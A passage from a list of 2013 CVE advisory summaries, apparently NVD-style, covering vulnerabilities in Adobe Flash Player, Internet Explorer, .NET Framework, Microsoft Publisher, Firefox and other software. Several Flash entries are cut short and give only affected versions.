10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3329] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3328] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3327] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3326] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3325] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3324] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3178] Microsoft Silverlight 5 before 5.1.20513.0 does not properly initialize arrays, which allows remote attackers to execute arbitrary code or cause a denial of service (NULL pointer dereference) via a crafted Silverlight application, aka "Null Pointer Vulnerability." [CVE-2013-3171] The serialization functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly check the permissions of delegate objects, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a partial-trust relationship, aka "Delegate Serialization Vulnerability." [CVE-2013-3166] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to inject arbitrary web script or HTML via vectors involving incorrect auto-selection of the Shift JIS encoding, leading to cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability," a different vulnerability than CVE-2013-0015. [CVE-2013-3164] Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3163] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3151. [CVE-2013-3162] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3115. [CVE-2013-3161] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3143. [CVE-2013-3153] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3148. [CVE-2013-3152] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3146. [CVE-2013-3151] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3163. [CVE-2013-3150] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3145. [CVE-2013-3149] Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3148] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3153. [CVE-2013-3147] Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3146] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3152. [CVE-2013-3145] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3150. [CVE-2013-3144] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3151 and CVE-2013-3163. [CVE-2013-3143] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3161. [CVE-2013-3142] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3139. [CVE-2013-3141] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3110. [CVE-2013-3139] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3142. [CVE-2013-3134] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 on 64-bit platforms does not properly allocate arrays of structures, which allows remote attackers to execute arbitrary code via a crafted .NET Framework application that changes array data, aka "Array Allocation Vulnerability." [CVE-2013-3133] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check the permissions of objects that use reflection, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Anonymous Method Injection Vulnerability." [CVE-2013-3132] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check the permissions of objects that use reflection, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Delegate Reflection Bypass Vulnerability." [CVE-2013-3131] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5, and Silverlight 5 before 5.1.20513.0, does not properly prevent changes to data in multidimensional arrays of structures, which allows remote attackers to execute arbitrary code via (1) a crafted .NET Framework application or (2) a crafted Silverlight application, aka "Array Access Violation Vulnerability." [CVE-2013-3129] Microsoft .NET Framework 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 [CVE-2013-3126] Microsoft Internet Explorer 9 and 10, when script debugging is enabled, does not properly handle objects in memory during the processing of script, which allows remote attackers to execute arbitrary code via a crafted web site, aka "Internet Explorer Script Debug Vulnerability." [CVE-2013-3125] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3120. [CVE-2013-3124] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3122. [CVE-2013-3123] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3111. [CVE-2013-3122] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3124. [CVE-2013-3121] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3120] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3125. [CVE-2013-3119] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3114. [CVE-2013-3118] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3120 and CVE-2013-3125. [CVE-2013-3117] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3122 and CVE-2013-3124. [CVE-2013-3116] Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3115] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3162. [CVE-2013-3114] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3119. [CVE-2013-3113] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3112] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3113, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3111] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3123. [CVE-2013-3110] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3141. [CVE-2013-3028] Multiple buffer overflows in mqm programs in IBM WebSphere MQ 7.0.x before 7.0.1.11, 7.1.x before 7.1.0.3, and 7.5.x before 7.5.0.2 on non-Windows platforms allow local users to gain privileges via unspecified vectors. [CVE-2013-2977] Integer overflow in IBM Notes 8.5.x before 8.5.3 FP4 Interim Fix 1 and 9.x before 9.0 Interim Fix 1 on Windows, and 8.5.x before 8.5.3 FP5 and 9.x before 9.0.1 on Linux, allows remote attackers to execute arbitrary code via a malformed PNG image in a previewed e-mail message, aka SPR NPEI96K82Q. [CVE-2013-2874] Google Chrome before 28.0.1500.71 on Windows, when an Nvidia GPU is used, allows remote attackers to bypass intended restrictions on access to screen data via vectors involving IPC transmission of GL textures. [CVE-2013-2867] Google Chrome before 28.0.1500.71 does not properly prevent pop-under windows, which allows remote attackers to have an unspecified impact via a crafted web site. [CVE-2013-2854] Google Chrome before 27.0.1453.110 on Windows provides an incorrect handle to a renderer process in unspecified circumstances, which allows remote attackers to cause a denial of service or possibly have other impact via unknown vectors. [CVE-2013-2728] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-2557] The sandbox protection mechanism in Microsoft Internet Explorer 9 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2555] Integer overflow in Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-2551] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-1309. [CVE-2013-2496] The msrle_decode_8_16_24_32 function in msrledec.c in libavcodec in FFmpeg through 1.1.3 does not properly determine certain end pointers, which allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted Microsoft RLE data. [CVE-2013-2492] Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information. [CVE-2013-2451] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Networking. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to improper enforcement of exclusive port binds when running on Windows, which allows attackers to bind to ports that are already in use. [CVE-2013-2310] SoftBank Wi-Fi Spot Configuration Software, as used on SoftBank SHARP 3G handsets, SoftBank Panasonic 3G handsets, SoftBank NEC 3G handsets, SoftBank Samsung 3G handsets, SoftBank mobile Wi-Fi routers, SoftBank Android smartphones with the Wi-Fi application before 1.7.1, SoftBank Windows Mobile smartphones with the WISPrClient application before 1.3.1, SoftBank Disney Mobile Android smartphones with the Wi-Fi application before 1.7.1, and WILLCOM Android smartphones with the Wi-Fi application before 1.7.1, does not properly connect to access points, which allows remote attackers to obtain sensitive information by leveraging access to an 802.11 network. [CVE-2013-2306] The jigbrowser+ application before 1.6.4 for Android does not properly open windows, which allows remote attackers to spoof the address bar via a crafted web site. [CVE-2013-2303] Sleipnir 4.0.0.4000 and earlier on Windows allows remote attackers to spoof the SSL lock icon and address-bar colors via unspecified vectors. [CVE-2013-2268] Unspecified vulnerability in the MathML implementation in WebKit in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, has unknown impact and remote attack vectors, related to a "high severity security issue." [CVE-2013-1715] Multiple untrusted search path vulnerabilities in the (1) full installer and (2) stub installer in Mozilla Firefox before 23.0 on Windows allow local users to gain privileges via a Trojan horse DLL in the default downloads directory. NOTE: this issue exists because of an incomplete fix for CVE-2012-4206. [CVE-2013-1712] Multiple untrusted search path vulnerabilities in updater.exe in Mozilla Updater in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird before 17.0.8, and Thunderbird ESR 17.x before 17.0.8 on Windows 7, Windows Server 2008 R2, Windows 8, and Windows Server 2012 allow local users to gain privileges via a Trojan horse DLL in (1) the update directory or (2) the current working directory. [CVE-2013-1700] The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location. [CVE-2013-1673] The Mozilla Updater in Mozilla Firefox before 21.0 on Windows does not properly maintain Mozilla Maintenance Service registry entries in certain situations involving upgrades from older Firefox versions, which allows local users to gain privileges by leveraging write access to a "trusted path." [CVE-2013-1672] The Mozilla Maintenance Service in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 on Windows allows local users to bypass integrity verification and gain privileges via vectors involving junctions. [CVE-2013-1610] Unquoted Windows search path vulnerability in RDDService in Symantec PGP Desktop 10.0.x through 10.2.x and Symantec Encryption Desktop 10.3.0 before MP3 allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory. [CVE-2013-1609] Multiple unquoted Windows search path vulnerabilities in the (1) File Collector and (2) File PlaceHolder services in Symantec Enterprise Vault (EV) for File System Archiving before 9.0.4 and 10.x before 10.0.1 allow local users to gain privileges via a Trojan horse program. [CVE-2013-1489] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 10 and Update 11, when running on Windows using Internet Explorer, Firefox, Opera, and Google Chrome, allows remote attackers to bypass the "Very High" security level of the Java Control Panel and execute unsigned Java code without prompting the user via unknown vectors, aka "Issue 53" and the "Java Security Slider" vulnerability. [CVE-2013-1451] Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not ensure that the SSL lock icon is consistent with the Address bar, which makes it easier for remote attackers to spoof web sites via a crafted HTML document that triggers many HTTPS requests to an arbitrary host, followed by an HTTPS request to a trusted host and then an HTTP request to an untrusted host, a related issue to CVE-2013-1450. [CVE-2013-1450] Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd. [CVE-2013-1406] The Virtual Machine Communication Interface (VMCI) implementation in vmci.sys in VMware Workstation 8.x before 8.0.5 and 9.x before 9.0.1 on Windows, VMware Fusion 4.1 before 4.1.4 and 5.0 before 5.0.2, VMware View 4.x before 4.6.2 and 5.x before 5.1.2 on Windows, VMware ESXi 4.0 through 5.1, and VMware ESX 4.0 and 4.1 does not properly restrict memory allocation by control code, which allows local users to gain privileges via unspecified vectors. [CVE-2013-1380] Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-1379] Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-1378] Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-1375] Heap-based buffer overflow in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-1374] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1373] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1372] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1371] Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-1370] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1369] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1368] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1367] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1366] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1365] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1347] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly allocated or (2) is deleted, as exploited in the wild in May 2013. [CVE-2013-1346] mpengine.dll in Microsoft Malware Protection Engine before 1.1.9506.0 on x64 platforms allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted file. [CVE-2013-1338] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1304. [CVE-2013-1336] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check signatures, which allows remote attackers to make undetected changes to signed XML documents via unspecified vectors that preserve signature validity, aka "XML Digital Signature Spoofing Vulnerability." [CVE-2013-1335] Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code via crafted shape data in a Word document, aka "Word Shape Corruption Vulnerability." [CVE-2013-1331] Buffer overflow in Microsoft Office 2003 SP3 and Office 2011 for Mac allows remote attackers to execute arbitrary code via crafted PNG data in an Office document, leading to improper memory allocation, aka "Office Buffer Overflow Vulnerability." [CVE-2013-1329] Integer signedness error in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers a buffer underflow, aka "Publisher Buffer Underflow Vulnerability." [CVE-2013-1328] Microsoft Publisher 2003 SP3, 2007 SP3, and 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers incorrect pointer handling, aka "Publisher Pointer Handling Vulnerability." [CVE-2013-1327] Integer signedness error in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers an improper memory allocation, aka "Publisher Signed Integer Vulnerability." [CVE-2013-1323] Microsoft Publisher 2003 SP3 does not properly handle NULL values for unspecified data items, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Incorrect NULL Value Handling Vulnerability." [CVE-2013-1322] Microsoft Publisher 2003 SP3 does not properly check table range data, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Invalid Range Check Vulnerability." [CVE-2013-1321] Microsoft Publisher 2003 SP3 does not properly check the data type of an unspecified return value, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Return Value Validation Vulnerability." [CVE-2013-1320] Buffer overflow in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Buffer Overflow Vulnerability." [CVE-2013-1319] Microsoft Publisher 2003 SP3 does not properly check the return value of an unspecified method, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Return Value Handling Vulnerability." [CVE-2013-1318] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers access to an invalid pointer, aka "Publisher Corrupt Interface Pointer Vulnerability." [CVE-2013-1317] Integer overflow in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers an improper allocation-size calculation, aka "Publisher Integer Overflow Vulnerability." [CVE-2013-1316] Microsoft Publisher 2003 SP3 does not properly validate the size of an unspecified array, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Negative Value Allocation Vulnerability." [CVE-2013-1312] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1311] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1310] Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1309] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-2551. [CVE-2013-1308] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1309 and CVE-2013-2551. [CVE-2013-1307] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-0811. [CVE-2013-1306] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1313. [CVE-2013-1304] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1338. [CVE-2013-1303] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338. [CVE-2013-1302] Microsoft Communicator 2007 R2, Lync 2010, Lync 2010 Attendee, and Lync Server 2013 do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an invitation that triggers access to a deleted object, aka "Lync RCE Vulnerability." [CVE-2013-1301] Microsoft Visio 2003 SP3 2007 SP3, and 2010 SP1 allows remote attackers to read arbitrary files via an XML document containing an external entity declaration in conjunction with an entity reference, aka "XML External Entities Resolution Vulnerability." [CVE-2013-1297] Microsoft Internet Explorer 6 through 8 does not properly restrict data access by VBScript, which allows remote attackers to perform cross-domain reading of JSON files via a crafted web site, aka "JSON Array Information Disclosure Vulnerability." [CVE-2013-1296] The Remote Desktop ActiveX control in mstscax.dll in Microsoft Remote Desktop Connection Client 6.1 and 7.0 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a web page that triggers access to a deleted object, and allows remote RDP servers to execute arbitrary code via unspecified vectors that trigger access to a deleted object, aka "RDP ActiveX Control Remote Code Execution 